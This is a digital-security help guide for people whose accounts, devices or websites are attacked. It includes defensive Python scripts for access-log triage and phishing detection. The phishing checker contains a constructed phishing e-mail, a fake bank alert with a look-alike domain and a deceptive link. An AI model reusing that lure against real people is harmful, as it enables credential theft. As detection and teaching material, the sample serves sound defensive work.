
My account was hacked

If your social media account is hacked and you lose access to it, here are some steps you can take to regain control and secure your account:

Check for unauthorized activity and review connected apps, devices, and permissions - If you suspect your account has been hacked but can still access it from another device, open the Security and Privacy settings of your account and look for unauthorized activity such as posts, messages, or changes to your profile information (name, email address, phone number, linked accounts). Also check the list of active sessions or logged-in devices and sign out any device you don't recognize; do this from a device you trust, so the attacker cannot simply log back in. This helps you assess the extent of the breach and the damage done.

Check in the Security and Privacy settings of your account for any third-party apps or services that have access to your social media account and revoke access to any suspicious or unfamiliar ones. This helps prevent future unauthorized access through connected apps.

Facebook - If there is an issue with your Facebook page, please log into Facebook and use Facebook's form to recover the page. If you cannot log into your Facebook account, please go through the Facebook account recovery workflow.

X - If you believe your X account is compromised, try following the steps in Help with my compromised account. If your account is not compromised, or you have other account access issues, you can follow the steps in Reactivate my account.

Google - Please try following the instructions in How to recover your Google Account or Gmail.

Yahoo - Please follow the instructions in Fix problems signing into your Yahoo account to recover your account.

Instagram - Please try following the instructions in If you think your Instagram account has been hacked to recover your account.

TikTok - Please try following the instructions in My account has been hacked to recover your account.

Proton - Please follow the instructions for resetting your password to recover your account. Please note that if you reset your password, you won’t be able to access your existing emails and contacts, since those are encrypted with a key that is protected with the password. Old data can be recovered if you have access to a recovery file or recovery phrase by following the steps in Recover Encrypted Messages and Files.

Contact platform support - Reach out to the support team of the social media platform through their designated channels (usually available on their website under “Help” or “Support”). Report the hacking incident and request assistance in recovering your account. Provide any relevant details or evidence that can help verify your identity as the rightful account owner.

Ask for further help - If the procedures suggested here haven't helped you recover access to your account, and if you are a journalist, activist, or a human rights defender, you can reach out to the following organizations to ask for further help:

Secure other accounts and enable multi-factor authentication (MFA) - If you used the same password for other accounts, change those passwords immediately, from a device you believe is clean, to prevent further unauthorized access. Use a unique, strong password for each of your accounts.

Once you regain access to your account, enable multi-factor authentication if the platform offers this feature. MFA adds an extra layer of security by requiring a second form of verification in addition to your password. An authenticator app or a hardware security key is stronger than a code sent by SMS, which can be intercepted if someone takes over your phone number; whichever method you choose, store the backup codes the platform gives you somewhere safe.

Please refer to this guide for details on how to set up MFA on multiple platforms. 2FA Directory has more information on which tools support MFA and provides links to helpful guides.

I forgot my password / username

In case you cannot remember or find the credentials you use to login to an account, here is some advice you can try out:

Recovery account - Most platforms and online service providers offer an option to set up a recovery or backup contact, usually an email address, a phone number, or a set of one-time backup codes. It is very important to set this up so you don't get locked out of your account, and to check regularly that you still have access to the recovery contact - otherwise you might never be able to get the lost account back.

If you can't access your account and are not logged in on any other device, use the recovery email address or phone number to regain access. Protect the recovery account just as carefully as the main one, because whoever controls it can reset the main account's password and take it over; this matters especially if you belong to an at-risk group.

Google provides an option to set up a recovery email account and phone number within the Personal info section of your Google Account. For Yahoo, you can use the Account Security page to add a recovery method, i.e. a phone number or an email address. Outlook, Hotmail, and other Microsoft accounts can also add a recovery email in the account security section.

Check the browser for saved passwords - Modern browsers (Firefox, Chrome, Edge) have the option to save your passwords, so you don’t have to enter them every time you log in. However, it is more secure to use a separate password management software such as KeePass, KeePassXC, or Bitwarden.

In cases where you cannot log in by typing your password, you should check if your browser saved a password at some point and use it to access your account. It is always advisable to copy and paste the password instead of typing it to avoid errors (though some websites don’t allow this). You can check for saved passwords in the options/preferences section within popular internet browsers: Firefox, Brave, Chrome, and Edge.

Password reset - In case you have trouble accessing your account and you have checked that you are entering the right password (mind the CAPS LOCK and keyboard language), you can try resetting your account password. On most platforms and online services this can be done by clicking on the link named “Forgot your password?” or something similar, which is located on the login page.

Follow the instructions on the “Forgot your password” page and make sure that you have access to the email address/phone number you used to create your account. If you don’t have access to this email or phone, you will need to use the recovery (backup) account if the provider supports that option. Otherwise, you might be left locked out of the account.

Most likely, the service provider will send you a password reset link or code via email or other means of communication, which will enable you to create a new password for your account. From then on, you will use the newly created password to access your account.

Security Questions - Another method to regain access to your account is to answer the security questions, if you enabled that option in your account security settings. However, some providers are removing this option because security questions are weak (the answers can often be guessed or found online). Also, people often leave the same answers in place for years, or simply forget them because they rarely need them.

However, if you still have a security question as your account backup solution, make sure the answer is kept in a safe place, that it is not some publicly available information or something easy to guess (“What’s your favourite food?” for example).

Access a trusted device - Having 2-step authentication turned on for all of your accounts is an essential security practice. However, in case the verification method you set up (phone number, app) is not working or has changed, you should try accessing the account from a trusted device. Many service providers offer the option (usually just a checkbox on the 2-step page) to mark a device as trusted so you wouldn’t have to enter 2-step security codes each time you log in on that specific device, such as your home computer.

Make sure that only personal devices (computers, tablets, phones) you use regularly are marked as trusted and never use this feature on public or someone else’s devices.

Request a recovery of a deleted account - In case your account gets deleted, there is a possibility that you could request a recovery, as long as not much time has passed since it was deleted. In case you haven’t used your account for a long time, you probably won’t be able to restore it in full.

The process differs among various service providers. With Google, for instance, a user will be asked a series of questions to confirm it is indeed their account. Advice Google gives to users trying to restore their accounts is to answer as many questions as possible without skipping them entirely, use a familiar device and location, be exact with passwords and security questions, use an email connected to your account which you can access (e.g. a recovery email) and add helpful details if you're asked why you can't access your account.

My account is blocked

At times, accessing your online account may become impossible as it could be blocked or disabled by the platform due to breaches of the Terms of Service or Community Guidelines. This situation may arise if your account faces a surge of fraudulent user reports or if the platform’s automated security systems wrongly flag legitimate content as a violation.

Submit an appeal to the platform - If you encounter messages indicating that your account is locked, restricted, disabled, or suspended, and you believe this action is unwarranted, follow any appeal mechanism accompanying the message. Guidance on how to submit appeals can be found at the following links:

Inform yourself about the platform’s terms - Please make sure that you’ve read the platform’s rules and that you understand what kind of behaviour can cause account suspensions.

My website is down

Websites can stop working or being accessible for a multitude of reasons; therefore, it is important to consider the following steps to try to find the root cause and resolve the issue:

List of server errors - When a browser tries to access a website, it is served a status code: a three-digit number that indicates whether the request was successful. Status codes are usually invisible to the user, but when they indicate an error, they are often shown in the browser. This can be helpful in solving issues when your website isn’t working.

Such status codes can be client errors, which start with a 4 (such as 404, meaning the page isn't found, or 403, meaning the user doesn't have access to the page), or server errors, which start with a 5 (such as 500, a general error in the application; 502, meaning a proxy or load balancer in front of your site received an invalid response from the web server behind it; or 503, meaning the server is temporarily unable to handle the request, often because it is overloaded). When dealing with such errors, refresh the page in your browser after making changes on the server, and check the server logs for more details if the issue persists.

DigitalOcean has provided a list of common client and server-type errors, what causes them, and detailed explanations of how each one can be resolved.

Contact your hosting provider - In case you are unable to fix issues yourself or through your system administrator, e.g., by troubleshooting server errors, your next course of action would be to contact your hosting provider. However, depending on whether your server is located in your country or abroad, your experience with the hosting provider may differ.

Even though foreign hosting providers may offer a better service than those in your country, be aware that their support might not resolve an issue with your website as quickly as you need.

Hosting providers with 24/7 support are the best option nonetheless, as well as those who provide additional support channels (live chat, call) in addition to opening a support ticket or sending an email.

Media, civil society organizations, and at-risk groups (e.g., LGBT+) should consider hosting solutions offered by Greenhost, Qurium, or Deflect, as their services are adapted to the needs of public interest actors.

Activate DDoS protection - Distributed Denial of Service (DDoS) attacks flood the server with a large number of automated requests, usually coming from thousands of IP addresses, in order to make the site unavailable. To keep your site from being taken down by a DDoS attack, activate DDoS protection. Such services act as a filter in front of your server, so make sure the server's own IP address is not reachable directly (for example by allowing web traffic only from the protection service); otherwise an attacker who learns the address can bypass the protection.

The most common DDoS protection service provider is Cloudflare, which offers free plans but with limited options. There are others such as Deflect, whose services are used by many media, environmental, and human rights organizations. Google also offers free DDoS protection through Project Shield, which is intended for news, human rights, and election monitoring sites.

Independent media, investigative journalists, and human rights activists in repressive regimes can also apply for Qurium’s Rapid Response support, which includes DDoS protection among other things. Cloudflare provides their paid service tier free of charge through Project Galileo, for which at-risk public interest actors can apply.

Change your password - If your website is down, shows content you did not publish, or behaves unusually, one of the first things to do is change your account password in the content management system (CMS) interface, such as WordPress. Also check for signs of compromise such as unknown plugins or themes, newly created users, or changes to existing users' privileges.

In serious incidents it is also advisable to change the server credentials (administrator or SSH/RDP password, hosting control panel, database). How this is done depends on the type of server (Windows Server or Linux).

Ask for server logs - To find the likely source of problems with your website, looking at the server logs can be of great importance. Server logs are text files that record activity on the server. For example, a web server's access log shows the IP address of every client that made a request, the browser or tool it reported (the user agent), the page requested, the date and time, and the status code returned, all of which can be crucial when investigating and mitigating a cyber incident.

You can request server logs for a certain time frame from your system administrator or through technical support.
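The following script is an added example, not part of the original toolkit, showing what the advice on status codes and server logs looks like in practice. It parses web server access log lines in the Apache/nginx "combined" format (the log lines below are constructed for this example, with documentation-range IP addresses), summarises the status codes the server returned, lists the most active client addresses, flags any address that sent many requests within a short window (what a DDoS or brute-force attempt looks like in the log), and lists failed requests for login or API endpoints. The window and threshold values are illustrative assumptions; tune them to your site's normal traffic.

```python
"""Access-log triage for a website that is down or behaving oddly.
Added example; the SAMPLE_LOG below is constructed, not a real log."""

import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: a normal visitor, a scanner probing WordPress login
# endpoints, and a burst of requests from one address while the backend
# is returning 502/503.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2024:13:55:36 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2024:13:55:37 +0000] "GET /style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:13:56:01 +0000] "POST /wp-login.php HTTP/1.1" 403 199 "-" "python-requests/2.31"
198.51.100.7 - - [10/Mar/2024:13:56:02 +0000] "GET /xmlrpc.php HTTP/1.1" 404 153 "-" "python-requests/2.31"
192.0.2.44 - - [10/Mar/2024:13:57:10 +0000] "GET /?q=1 HTTP/1.1" 502 0 "-" "curl/8.0"
192.0.2.44 - - [10/Mar/2024:13:57:10 +0000] "GET /?q=2 HTTP/1.1" 502 0 "-" "curl/8.0"
192.0.2.44 - - [10/Mar/2024:13:57:11 +0000] "GET /?q=3 HTTP/1.1" 502 0 "-" "curl/8.0"
192.0.2.44 - - [10/Mar/2024:13:57:11 +0000] "GET /?q=4 HTTP/1.1" 503 0 "-" "curl/8.0"
192.0.2.44 - - [10/Mar/2024:13:57:12 +0000] "GET /?q=5 HTTP/1.1" 503 0 "-" "curl/8.0"
"""

# Combined log format: client IP, ident, user, [timestamp], "request",
# status, size, "referrer", "user agent".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def status_summary(entries):
    """Counts by status class: '2xx' ok, '4xx' client error, '5xx' server error."""
    return dict(Counter(f"{e['status'] // 100}xx" for e in entries))


def top_clients(entries, n=3):
    """Most active client addresses with their request counts."""
    return Counter(e["ip"] for e in entries).most_common(n)


def bursty_clients(entries, window=timedelta(seconds=10), threshold=5):
    """Addresses that sent at least `threshold` requests inside any `window`
    (sliding window over each client's sorted timestamps)."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e["time"])
    flagged = []
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(ip)
                break
    return flagged


def suspicious_requests(entries):
    """Failed requests to login/API endpoints: a cheap indicator of
    brute-force or scanning activity against a CMS."""
    return [(e["ip"], e["request"]) for e in entries
            if e["status"] in (401, 403, 404)
            and any(p in e["request"] for p in ("wp-login", "xmlrpc", "/admin"))]


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("status classes:", status_summary(log))
    print("top clients:", top_clients(log))
    print("bursty clients:", bursty_clients(log))
    print("suspicious:", suspicious_requests(log))
```

Point the script at the log file your hosting provider or administrator sends you (read the file and pass its text to `parse_log`). A few addresses dominating the request count together with a rise in 5xx responses points to an overload or DDoS; repeated 401/403/404 responses on login endpoints from one address point to a brute-force attempt, and that address is the one to block or to report.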

Request backup restore - Once a cyber incident is resolved, check whether anything is missing. Malicious actors may have deleted some of the content from your website, so it is important to have regular server and website backups.

If you notice that content is missing after the incident has been handled, it can be restored by requesting a backup from your hosting provider or technical support. Make sure the backup you restore was taken before the compromise; a backup made while the attacker already had access may bring back their changes (added users, modified files, hidden scripts) along with your content.

I am being stalked

If you suspect that someone is stalking you online by diligently and continually following you and attempting to contact you, here are some steps you can take to protect yourself:

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X, and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends, for example.

Block and report stalker’s accounts - Use the Block option to prevent a person from contacting you through an online service or engaging with the content you share. In addition, make sure to report the person to the platform for harassing you.

Turn off location services - If you suspect that someone is tracking your location, consider turning off location services on your devices. This prevents them from being able to track your whereabouts without your knowledge. Also, be mindful of unknown AirTags or similar tracking devices as they also present a security risk. For more information on Bluetooth trackers, refer to this guide by the Electronic Frontier Foundation.

Reduce your online footprint - Limit the visibility of your online content only to your circle of followers or friends. For example, you can limit who can view your Facebook posts and set them to friends only, or set an account to be private using the advice on limiting profile visibility. You can also ask people not to share photos of you online and refrain from tagging you in their posts.

Consider using an anonymous account - If you still need an online account for work purposes, create a separate account under a made-up name, don't link it to your existing accounts (no shared email address, phone number, or profile photo), and don't tell anyone it is yours.

Seek support - If you feel unsafe or threatened, seek support from trusted friends, family members, or a counsellor.

Report to the police - In case you feel frightened for your physical safety, call the police without hesitation.

My partner is spying on me

If you suspect that your partner may be spying on you, whether it's through digital means or otherwise, it's important to take steps to protect your privacy and well-being. Here's some advice on what to do in such a situation:

Assess the situation - Take some time to reflect on your suspicions and gather any evidence that supports your concerns. It's essential to understand the extent of the spying and whether it's a violation of your privacy and trust.

Protect your devices - Take steps to secure your digital devices and accounts. This could include changing passwords regularly, setting up a lock method (PIN, pattern), enabling two-factor authentication, and ensuring that your devices are not easily accessible to your partner without your consent and knowledge.

Turn off location services - If you suspect your partner is tracking your location, consider turning off location services on your devices. This prevents them from being able to track your whereabouts without your knowledge.

Check for tracking devices - Be mindful of unknown AirTags or similar tracking devices as they also present a security risk. For more information on Bluetooth trackers, refer to this guide by the Electronic Frontier Foundation.

Be mindful of communication - Be cautious about what you share with your partner, especially if you suspect they may be monitoring your communications. Consider using secure messaging apps such as Signal or having sensitive conversations in person.

Seek support - If you feel unsafe or threatened by your partner's behavior, seek support from trusted friends, family members, or a counselor. You may also consider reaching out to a domestic abuse hotline or support organization for guidance and assistance.

My intimate content is being shared without consent

Non-consensual intimate image sharing is defined as posting sexually explicit content without consent, with the intent of humiliation, shame, or blackmail. It is a violation of privacy and can result in extreme emotional trauma. There are various similar forms of online privacy invasions, such as hyper-realistic software-manipulated video or audio content known as deepfake, which can be used to depict intimate images or sexual content with your likeness.

Another very problematic issue with serious consequences for privacy is so-called doxing, i.e. publishing private information about a person such as their phone number (mobile, home landline, or work phone), home address, email address, copies of identification documents such as ID cards or passports, payment card numbers, and so on.

SHARE Foundation and partner organisations developed Cyber Intimacy, a practical guide on how to act when someone shares your intimate content online without your knowledge and consent, with advice on how to collect the evidence, report the content to large online platforms, ask for support from organisations, file a criminal complaint, as well as templates for requesting the removal of the content in question.

Document the situation - Collect all the information (links, messages, etc.) about the intimate content in one place and make sure to update the list accordingly.

Save evidence - Download the content and take screenshots or screen recordings to collect evidence of your intimate content being posted online, so that it can be submitted in legal proceedings. Make sure the address (URL), the account name, and the date and time are visible in what you capture.

Report the content to the platforms - Make sure to report all the instances of content to the online platforms and keep track of their responses.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Block and report accounts - Use the Block option to prevent further abuse from accounts through an online service or engaging with the content you share. In addition, make sure to report the accounts posting your private content to the platform.

Remove any publicly visible personal data from your accounts - Review your online profiles and posts and make sure to remove any personal data you might have made public, such as your email address or phone number.

Reduce your online footprint - Limit the visibility of your online content only to your circle of followers or friends. For example, you can limit who can view your Facebook posts and set them to friends only, or set an account to be private using the advice on limiting profile visibility. You can also ask people not to share photos of you online and refrain from tagging you in their posts.

Consider using an anonymous account - If you still need an online account for work purposes, create a separate account under a made-up name, don't link it to your existing accounts (no shared email address, phone number, or profile photo), and don't tell anyone it is yours.

Seek support - Reach out to the organisations which can provide legal assistance and support through the Cyber Intimacy platform.

Report to the police - In case the privacy invasion persists and you feel frightened for your physical safety, call the police without hesitation.

I am being cyberbullied

Cyberbullying can take many forms, ranging from threats of violence, hate speech, discrimination, trolling, false accusations to public humiliation, among others. It can sometimes spiral out of control and cause profound consequences. However, here are some steps you can take in case you are a target of cyberbullying:

Document everything - Save any harassing messages, emails, posts, or comments, as it can be useful when reporting the case to the authorities or online platforms.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Block and report - Use the Block option to prevent further abuse through an online service or engaging with the content you share. In addition, make sure to report the person to the platform for harassing you, along with any content that presents cyberbullying.

Don't engage - Avoid engaging with the cyberbully or responding to their messages, as engaging can sometimes fuel further harassment.

Reduce your online footprint - Limit the visibility of your online content only to your circle of followers or friends. For example, you can limit who can view your Facebook posts and set them to friends only, or set an account to be private using the advice on limiting profile visibility. You can also ask people not to share photos of you online and refrain from tagging you in their posts.

Consider using an anonymous account - If you still need an online account for work purposes, create a separate account under a made-up name, don't link it to your existing accounts (no shared email address, phone number, or profile photo), and don't tell anyone it is yours.

Seek support - Talk to someone you trust about what you're experiencing, such as a friend, family member, teacher, or counsellor.

Report to the police - In case the cyberbullying persists and you feel frightened for your physical safety, call the police without hesitation.

Someone is impersonating me

Fake online profiles are easy to make, especially on social media platforms, which means practically anyone can impersonate you in just a few steps. Impersonation can cause a lot of distress and potentially get you in trouble for something you did not do, but here is some advice on how to handle these situations:

Document everything - Save information (links to profiles, screenshots, usernames and display names, etc.) on accounts that are impersonating you or someone you know, as it can be useful when reporting the case to the authorities or online platforms.

Report fake profiles for impersonation - In case someone is impersonating you by making fake online accounts, you can use platform mechanisms to report them. Here you can find more instructions on how to report impersonation on different online services: Facebook, Instagram, TikTok, X and YouTube.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Notify your contacts - Also, a good strategy is to reach out to your friends, family and network of contacts to warn them of these manipulating accounts and ask them to also report these accounts.

Consider verifying your account - Online platforms offer account verification through identity checks, so this is an option to consider, especially if you are a journalist or an otherwise publicly exposed person. For more details refer to these guides from Facebook, Instagram, X, TikTok and YouTube.

Seek support - Talk to someone you trust about what you're experiencing, such as a friend, family member, teacher, or counsellor.

I disclosed my login details

Links shared through text or chat messages or emails can take you to fake login pages that will steal your credentials, or other types of pages that might steal your personal or financial information. Sometimes, these malicious websites might ask you to download attachments that run malicious software on your device when opened. Important steps you can take:

Change passwords - If you entered your login credentials, your accounts may be at risk! Change the password immediately, from a device you trust, and follow the instructions in the "My account was hacked" section of this toolkit, including signing out of all other sessions. If you also entered a one-time verification code on the fake page, treat the account as already compromised, since the attacker may have used that code to log in. If you used the same password anywhere else, change it there too.

Save the message - Make a screenshot of the message so that the sender’s contacts (email address, phone number, name), links and potential attachments are clearly visible.

Watch out for account security notifications - In case you receive a security notification regarding your account, such as new login attempts or changes to your contacts, do not approve them and secure your account.

Monitor changes on your bank account - Also, monitor your online banking account or look for notifications from the bank in case your funds are withdrawn, and immediately contact your bank’s customer service to prevent further abuses.

Notify your contacts - You should also inform your community about this malicious message and warn them of the fraud.

I downloaded a suspicious file

In case you downloaded some malicious files to your device from a scam email or message, your device may be at risk! The trick here is not to open that file because opening it will most likely run a malicious program that might be hidden in the file.

Run an antivirus scan on the downloaded file - You can scan the file with your antivirus program such as Bitdefender or Avira. It is also recommended that you run a full scan of your device with the antivirus software and remove any other malicious files from your device.

Look for any suspicious device activity - Try to notice anything problematic with your device, such as programs opening on their own, device becoming sluggish, battery drain or pop-up windows in your browser.

If you opened the file, run a full antivirus scan and change passwords - If you opened the suspicious attachment, scan your device with antivirus software and, using another device you trust, change the passwords of the accounts you were logged into on the affected device. Also sign out of all sessions on those accounts, because malware can steal saved logins and active session cookies, which keep working even after the password is changed.

Watch out for account security notifications - In case you receive a security notification regarding your account, such as new login attempts or changes to your contacts, do not approve them and secure your account.

Monitor changes on your bank account - Also, monitor your online banking account or look for notifications from the bank in case your funds are withdrawn, and immediately contact your bank’s customer service to prevent further abuses.

Notify your contacts - You should also inform your community about this malicious message and warn them of the fraud.

I disclosed my payment card information

You may find yourself in a situation where a malicious actor gains access to information on your credit or debit card, e.g. card holder name, card number, date of validity, etc. The scammers can get access to this data in multiple ways, for example through malicious websites designed to look as genuine card payment processing websites or by tricking the card holders to take photos of both sides of their payment card through social engineering. In case you reveal your payment card information, the following steps are of key importance:

Block your payment card - As a first step, you should immediately block your payment card either by contacting the bank directly or by using your bank’s online account or mobile application.

Monitor changes on your bank account - Also, monitor your online banking account or look for notifications from the bank in case your funds are withdrawn, and immediately contact your bank’s customer service to prevent further abuses.

Do not provide bank security codes - For some online card payments the bank will send you, usually via SMS, a one-time confirmation code containing several digits. Do not provide this code to anyone, especially if they are pretending to be a bank employee.

Report the incident - If you willingly disclose your payment card information and experience a loss of funds, you have the option to report the incident to the authorities. However, if you lose money due to a security incident where your payment card information wasn't disclosed by you, contacting your bank increases the likelihood of recovering your funds. Steps on how to secure your funds may vary depending on the bank, so it is best to contact your bank’s customer service.

I received a suspicious message

In case you only received a message (email, SMS, chat app) that might be suspicious, consider the following:

Take a closer look at the message - State institutions, online shops, banks, and delivery services will never ask you to provide your personal or financial information through a link in a message. Also, if an offer seems too good to be true (free products or services, significant discounts on expensive products, prize money, etc.), it most likely is a scam. Check the actual sender address rather than just the display name, and before clicking a link, hover over it (or press and hold on a phone) to see where it really leads; a link whose text shows one website but opens another is a classic sign of phishing.

Note the contents of the message itself - Is the message written logically and grammatically correctly? Pay attention to details such as the design of the message and compare it to previous ones from the same sender.

Do not act upon the instructions - Any suspicious message should be marked as spam, deleted, and the sender blocked to prevent further contact.

Examples of phishing emails and text messages can be found in this guide. For additional information on how to analyse suspicious messages, visit the Email analysis section of this toolkit.
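As an added example (not part of the original toolkit), the script below applies two of the checks described above to a raw e-mail message: whether the Reply-To address points to a different domain than the sender, and whether any link's visible text shows one website while its href leads to another. The message, addresses and domains in it are constructed for the example and do not refer to any real organisation; the parsing is deliberately simple (one HTML part, regex-based link extraction) and is meant as a first look at a suspicious message, not a replacement for the email analysis section of the toolkit.

```python
"""Quick phishing checks on a raw e-mail. Added example; SAMPLE_EMAIL
is constructed and the domains in it are invented."""

import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: display name claims a bank, the sending domain is a
# look-alike, Reply-To goes elsewhere, and the first link's text does not
# match where it points.
SAMPLE_EMAIL = """\
From: "Example Bank Security" <alerts@examp1e-bank.example>
Reply-To: verify@mail-recovery.example
To: customer@example.org
Subject: Urgent: confirm your account
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your account will be suspended. Sign in within 24 hours:</p>
<a href="http://login.examp1e-bank.example/verify">https://www.example-bank.example/login</a>
<p>Or download the attached statement.</p>
<a href="https://www.example-bank.example/help">Help centre</a>
</body></html>
"""

# Matches <a ... href="...">text</a>; good enough for typical HTML mail.
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def host_of(url):
    """Lower-case host of a URL without port; '' if it cannot be parsed."""
    return (urlparse(url.strip()).hostname or "").lower()


def domain_of(address):
    """Domain part of an e-mail address, lower-cased."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def check_headers(msg):
    """Flag a Reply-To whose domain differs from the From domain."""
    findings = []
    _, sender = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != domain_of(sender):
        findings.append(f"Reply-To domain differs from From: {reply_to} vs {sender}")
    return findings


def check_links(html):
    """Flag anchors whose visible text is a URL on a different host than the href."""
    findings = []
    for href, text in ANCHOR_RE.findall(html):
        shown = re.sub(r"<[^>]+>", "", text).strip()
        if shown.lower().startswith(("http://", "https://", "www.")):
            shown_url = shown if "://" in shown else "http://" + shown
            shown_host, real_host = host_of(shown_url), host_of(href)
            if shown_host and shown_host != real_host:
                findings.append(f"link text shows {shown_host} but goes to {real_host}")
    return findings


def analyse(raw):
    """Run all checks on a raw message and return the list of findings."""
    msg = message_from_string(raw)
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8")
    return check_headers(msg) + check_links(body)


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EMAIL):
        print("WARNING:", finding)
```

To use it on a real message, save the message in its original form (most mail clients offer "Show original", "View source" or "Download as .eml"), read the file and pass its contents to `analyse`. An empty list of findings does not mean the message is safe; a phishing mail can pass both checks, so the other signs listed above still apply.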

My device is lost / stolen

In the event of your device being lost or stolen, you should consider the following:

Change all passwords - If you believe that your device might have been stolen, as a precautionary measure it is good to change all the passwords to your accounts that are logged in. It is also advisable to use a trusted device to log out from all sessions on the lost device.

Changing all of your passwords is much easier and safer with the help of specialised applications called password managers. These apps securely store your login credentials and protect them with a master password. That way, you only need to remember your master password and you can copy/paste your other credentials directly from the app. Password management software usually has the option to automatically generate a long and complex password, made of randomised characters and symbols. Applications commonly used for password management are KeePass, KeePassXC and Bitwarden.

Remote lock and erase - Android phones, in case they have the “Find My Device” option enabled, provide you with the possibility to remotely lock them with your PIN, pattern, or password or even erase all data on the phone. Google provides further instructions on how to secure seized Android devices. Similar options are provided by Apple for iOS devices such as iPhone or iPad.

Locate a device - In case you can’t find your device and suspect that it might have been stolen, there are ways to determine its possible location. For example, both Android smartphones and iPhones have the option to remotely locate the device. For further details and requirements (e.g. the device must be turned on, connected to the internet, etc.) on how to enable the remote find option, visit Google’s instructions for Android devices or Apple’s guide in case the device is an iPhone or iPad.

Report the disappearance - If you did not manage to find your phone or you are confident it has been stolen, make sure to report it to the police. Try to remember where and when you last had your device with you and any other details that might be of help (were you alone or with someone, etc.).

My device is damaged

In case your device is broken or damaged, consider the following steps:

Factory reset - Your device may start acting strangely and having various performance issues (working too slowly, showing too many errors, certain apps or features not working). In case you cannot resolve these issues by restarting the device and/or clearing the cache, running an antivirus or antimalware check, or updating your device software, drivers, or operating system, a factory reset might be a solution.

Be aware that if you run a factory reset on your phone all the data will be lost, so make sure to back up any important data before proceeding. See more information from Google on how to do a factory reset on Android devices or Apple’s support page on how to do the same on iOS-based devices.

Repair shop - If resetting your device to factory settings did not resolve the issues you experienced, it might be best to take the device to a repair shop. Before you do this, it is important to back up any data on your device and also make sure to protect your device, sensitive files, and apps with a password or a PIN.

Before choosing a specific repair shop, do a simple online search and try to find the ones with the best online reviews and positive comments.

Data recovery tools - In case your files are lost or you accidentally deleted them and you don’t have a backup, there are data recovery tools that can help you. Unless the data was deleted with an advanced tool such as Eraser, conventional data recovery tools might help you restore files.

Recuva is data recovery software for Windows which has both free and paid versions. For an average user, the free option should be enough to recover deleted files, and it also works with memory cards, external hard drives, and USB sticks. Disk Drill, another recovery tool with a free plan, also works for MacOS in addition to Windows.

My device was seized

If you are attending a protest or other high-risk event, your devices such as mobile phones might be seized by the police or private security. In case this happens, your private data becomes exposed to all kinds of risks. With this in mind, consider the following:

Remote lock and erase - Android phones, in case they have the “Find My Device” option enabled, provide you with the possibility to remotely lock them with your PIN, pattern, or password or even erase all data on the phone. Google provides further instructions on how to secure seized Android devices. Similar options are provided by Apple for iOS devices such as iPhone or iPad.

Check your device - In case your device was taken from you, once you get it back make sure to check for any suspicious changes, e.g. if there are unknown apps installed or changes to settings. On Android phones, you can check whether Play Protect is turned off, as it offers protection against potentially malicious apps. In case it was turned off, make sure to turn it back on.

I got an antivirus warning

Discovering that your device is infected with malware can be concerning, but there are steps you can take to address the issue and minimise the damage:

Isolate the device - Disconnect your infected device from any network connections, including Wi-Fi and wired connections, to prevent the malware from spreading to other devices on your network.

Run antivirus software - Use antivirus or antimalware software such as Bitdefender or Avira to scan your device for malware. Make sure your antivirus definitions are up-to-date before running the scan. Allow the software to remove or quarantine any detected malware.

Update software and operating system - Ensure that your operating system, web browsers, and other software are up-to-date with the latest security patches and updates. Malware often exploits vulnerabilities in outdated software to infect devices.

Change passwords - If you suspect that sensitive information such as passwords may have been compromised, change those passwords immediately. Choose strong, unique passwords for each account to enhance security.

Backup important data - If you haven't already done so, back up any important files or data on your device to an external storage device or cloud service. This can help prevent data loss in case the malware causes damage to your files.

Consider asking for help - If you're unable to remove the malware on your own or if the infection is severe, consider seeking help from a professional computer technician.

My data is ransomed / locked

One of the biggest security problems and forms of cybercrime today is ransomware. This type of malware encrypts files so that they cannot be accessed without a decryption key. The attackers then ask for payments in cryptocurrency to provide targets with the decryption key, usually within a short time frame to put more pressure on the targets.

